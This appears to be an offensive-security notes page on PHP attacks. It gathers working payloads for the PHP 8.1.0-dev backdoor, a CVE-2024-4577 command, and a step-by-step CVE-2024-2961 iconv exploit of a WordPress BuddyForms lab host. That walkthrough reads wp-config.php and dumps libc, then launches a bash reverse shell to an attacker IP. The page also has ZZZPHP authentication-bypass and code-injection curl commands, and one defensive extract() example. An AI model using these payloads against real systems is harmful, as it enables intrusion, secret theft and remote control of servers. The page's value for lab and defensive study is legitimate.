# PHP

{% embed url="https://ctf-wiki.mahaloz.re/web/php/php/" %}

## PHP 8.1.0-dev

Try RCE & SQLi

```
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
```

<figure><img src="/files/k4Wi3KFphyojEPOYqP2U" alt=""><figcaption></figcaption></figure>

## PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC

```
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
```

{% embed url="https://github.com/watchtowrlabs/CVE-2024-4577" %}

```
python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('calc');?>" -t http://192.168.253.132/test.sina
```

## Iconv

{% embed url="https://www.ambionics.io/blog/iconv-cve-2024-2961-p1" %}

{% embed url="https://media.defcon.org/DEF%20CON%2032/DEF%20CON%2032%20presentations/DEF%20CON%2032%20-%20Charles%20Fol%20-%20Iconv%20set%20the%20charset%20to%20RCE%20exploiting%20the%20glibc%20to%20hack%20the%20PHP%20engine.pdf" %}

### LFI

For buddyforms 2.7.7

{% embed url="https://github.com/kyotozx/CVE-2024-2961-Remote-File-Read/tree/main" %}

```
# python lfi.py
Remote File Read - CVE-2024-2961
Enter the path of the file you want to read (e.g., /etc/passwd): ../wp-config.php
Enter a numeric ID for the upload (e.g., 1): 1
File uploaded successfully: http://host.htb/wp-content/uploads/2025/01/1-17.png
GIF89a\nM<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */
<-SNIP->
```

### RCE

Find the `libc.so` path on the target machine

```
# curl 'http://host.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/proc/self/maps' -v
<-SNIP->
{"status":"OK","response":"http:\/\/host.htb\/wp-content\/uploads\/2025\/01\/1-21.png","attachment_id":191}#
```

```
# curl http://host.htb/wp-content/uploads/2025/01/1-21.png | grep libc.so
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     07f29c1467000-7f29c148d000 r--p 00000000 00:3b 292782                     /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c148d000-7f29c15e2000 r-xp 00026000 00:3b 292782                     /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c15e2000-7f29c1635000 r--p 0017b000 00:3b 292782                     /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c1635000-7f29c1639000 r--p 001ce000 00:3b 292782                     /usr/lib/x86_64-linux-gnu/libc.so.6
7f29c1639000-7f29c163b000 rw-p 001d2000 00:3b 292782                     /usr/lib/x86_64-linux-gnu/libc.so.6
100 72048  100 72048    0     0   169k      0 --:--:-- --:--:-- --:--:--  169k
```

Download `libc.so`

```
# curl 'http://host.htb/wp-admin/admin-ajax.php' -H "Content-Type: application/x-www-form-urlencoded" -d 'action=upload_image_from_url&id=1&accepted_files=image/gif&url=php://filter/convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode/resource=/usr/lib/x86_64-linux-gnu/libc.so.6' -v
*   Trying 10.10.11.52:80...
* Connected to host.htb (10.10.11.52) port 80 (#0)
> POST /wp-admin/admin-ajax.php HTTP/1.1
> Host: host.htb
> User-Agent: curl/7.88.1
> Accept: */*
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 2069
> 
< HTTP/1.1 200 OK
< Date: Tue, 28 Jan 2025 08:41:14 GMT
< Server: Apache/2.4.62 (Debian)
< X-Powered-By: PHP/8.3.2
< X-Robots-Tag: noindex
< X-Content-Type-Options: nosniff
< Expires: Wed, 11 Jan 1984 05:00:00 GMT
< Cache-Control: no-cache, must-revalidate, max-age=0
< Referrer-Policy: strict-origin-when-cross-origin
< X-Frame-Options: SAMEORIGIN
< Vary: Accept-Encoding
< Content-Length: 115
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host host.htb left intact
{"status":"OK","response":"http:\/\/host.htb\/wp-content\/uploads\/2025\/01\/1-22.png","attachment_id":191}# 
```

```
# wget http://host.htb/wp-content/uploads/2025/01/1-22.png 
```

Clean the dump and add the missing section headers:

1 - On your host, find the starting offset of the section headers in a `libc.so` of the same version as the victim's, here `libc.so.6`

```
# readelf -S /lib/x86_64-linux-gnu/libc.so.6

There are 64 section headers, starting at offset 0x1d4458:

Section Headers:
  [Nr] Name              Type             Address           Offset
       Size              EntSize          Flags  Link  Info  Align
  [ 0]                   NULL             0000000000000000  00000000
<-SNIP->

```

Here the starting offset is `0x1d4458`

2 - Extract `libc.so` from the png file

```
# cat cleanPngToElf.py
def extract_libc(png_path, output_path, start_offset, total_size):
    """
    Extract the libc.so.6 bytes embedded in the PNG returned by the upload.
    """
    with open(png_path, 'rb') as png_file:
        # Skip the image prefix and read exactly the number of bytes
        # that make up libc.so.6
        png_file.seek(start_offset)
        extracted_data = png_file.read(total_size)

    with open(output_path, 'wb') as output_file:
        output_file.write(extracted_data)

    print(f"Extracted libc.so.6 data to {output_path}")
    print(f"Extracted size: {len(extracted_data)} bytes")

def append_valid_section_headers(libc_path, reference_libc_path,
                                 headers_offset, headers_size):
    """
    Append the section header table of a reference libc.so.6 (same version
    as the victim's) to the extracted file, which lacks valid headers.
    """
    with open(reference_libc_path, 'rb') as ref_file:
        ref_file.seek(headers_offset)
        section_headers_data = ref_file.read(headers_size)

    with open(libc_path, 'ab') as libc_file:
        libc_file.write(section_headers_data)

    print("Appended section headers from reference libc.so.6.")

# Paths to files
png_file_path = '1-22.png'
reference_libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
output_libc_path = 'libc.so.7'

# Known offsets and sizes
elf_start_offset = 9  # offset of the ELF header inside the downloaded png
section_headers_offset = 0x1D4458  # section headers offset reported by readelf -S on the reference libc.so.6
total_section_headers_size = 60 * 64  # number of section headers * 64 bytes per ELF64 section header
total_size = section_headers_offset + total_section_headers_size - elf_start_offset  # full size of libc.so.6

# Step 1: Extract the main ELF data from the png file
extract_libc(
    png_path=png_file_path,
    output_path=output_libc_path,
    start_offset=elf_start_offset,
    total_size=total_size
)

# Step 2: Append section headers from the reference libc.so.6
append_valid_section_headers(
    libc_path=output_libc_path,
    reference_libc_path=reference_libc_path,
    headers_offset=section_headers_offset,
    headers_size=total_section_headers_size
)

print(f"Fixed libc.so.6 saved to: {output_libc_path}")
```

```
# python cleanPngToElf.py
Extracted libc.so.6 data to libc.so.7
Extracted size: 1921871 bytes
Appended section headers from reference libc.so.6.
Fixed libc.so.6 saved to: libc.so.7

# file libc.so.7
libc.so.7: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=82ce4e6e4ef08fa58a3535f7437bd3e592db5ac0, for GNU/Linux 3.2.0, stripped
```

Exploit

{% embed url="https://github.com/0xSs0rZ/Buddyforms_exploit.git" %}

Put the cleaned `libc.so` into `LIBC_FILE`

```
# python3 exploit.py 'http://host.htb/wp-admin/admin-ajax.php' 'bash -c "bash -i >& /dev/tcp/10.10.X.X/4444 0>&1"'
```

## Extract

`extract()` on user-controlled data lets the request redefine variables that the code already set before `extract()` was called

{% embed url="https://technicalnavigator.in/php-extract-bug/" %}

{% embed url="https://github.com/HackThisSite/CTF-Writeups/blob/master/2016/SCTF/Ducks/README.md" %}

{% embed url="https://www.thesecuritywind.com/post/metared-ctf-argentina#viewer-ebtkc" %}
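The overwrite described above, as an added example that is not code from the page or the linked write-ups: the vulnerable pattern beside the two `extract()` flags that stop it. The function names and the `$isAdmin` variable are made up for the demo.

```php
<?php
// Added example, not from the original page. Names ($isAdmin, $request,
// the three functions) are invented for the demo.

// Vulnerable pattern: a trusted default is set in code, then extract() runs
// over request data in its default mode EXTR_OVERWRITE, so a request that
// carries isAdmin=1 silently replaces the trusted value.
function vulnerableCheck(array $request): bool
{
    $isAdmin = false;
    extract($request);                 // EXTR_OVERWRITE is the default
    return (bool) $isAdmin;            // now controlled by the request
}

// Hardened variant 1: EXTR_SKIP leaves any variable that already exists alone.
function hardenedSkip(array $request): bool
{
    $isAdmin = false;
    extract($request, EXTR_SKIP);
    return (bool) $isAdmin;            // keeps the value set in code
}

// Hardened variant 2: EXTR_PREFIX_ALL imports every key under a prefix
// ($req_isAdmin, $req_name), so request data cannot collide with the
// script's own variables and every use of it is explicit.
function hardenedPrefix(array $request): array
{
    $isAdmin = false;
    extract($request, EXTR_PREFIX_ALL, 'req');
    return [
        'isAdmin'     => $isAdmin,              // untouched
        'req_isAdmin' => $req_isAdmin ?? null,  // the request value, labelled as such
    ];
}

// Constructed input, equivalent to a query string of ?isAdmin=1&name=guest
$request = ['isAdmin' => '1', 'name' => 'guest'];

var_dump(vulnerableCheck($request));
var_dump(hardenedSkip($request));
print_r(hardenedPrefix($request));
```

`EXTR_SKIP` only protects variables that already exist at the call; anything the script reads later without initialising first can still be injected, so initialise every variable before `extract()` or keep request arrays out of it altogether.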

## ZZZPHP

### ISSESSION adminid Authentication Bypass

```
curl -i -X GET "http://$TARGET_HOST/admin871/?index" \
-H "Cookie: zzz_adminid=1"

curl -b "PHPSESSID=abcdef123456; zzz_adminid=1" http://target.com/admin.php
```

### parserIfLabel eval PHP Code Injection

```
curl -X POST "http://$TARGET_HOST/admin871/save.php?act=editfile" \
 -H "Cookie: zzz_adminid=1" \
 -d "file=/template/pc/cn2016/html/search.html&filetext={if:phpinfo()}{end if}"
```

This command sends a POST request to edit `search.html`, injecting the PHP code `phpinfo()` into it.

After injecting the PHP code, accessing the `search.html` page or triggering its rendering will execute the injected code.

### Ev1l eva1 bypass

```
curl -X POST "http://victime.com/vuln.php" \
  -d "user_input=assert&server_input=<?php phpinfo(); ?>&cookie_input=<?php system('whoami'); ?>" \
  -H "Cookie: session=<?php phpinfo(); ?>" \
  -H "X-Custom-Header: <?php system('ls'); ?>"
```

```
curl -X POST "http://victime.com/vuln.php" \
  -d "user_input=assert('phpinfo();')" \
  -H "Cookie: session=assert('phpinfo();')" \
  -H "X-Custom-Header: assert('phpinfo();')"
```

## XXE in PHP

{% embed url="https://swarm.ptsecurity.com/impossible-xxe-in-php/?s=03" %}

{% embed url="https://github.com/bytehope/wwe/tree/main" %}

## Pearcmd - LFI to RCE

{% embed url="https://h4ndsh.github.io/2023/phpinfo/" %}

{% embed url="https://book.jorianwoltjer.com/languages/php#rce-using-pearcmd.php" %}

{% embed url="https://gist.ly/youtube-summarizer/exploiting-local-file-inclusion-to-remote-code-execution-in-php" %}

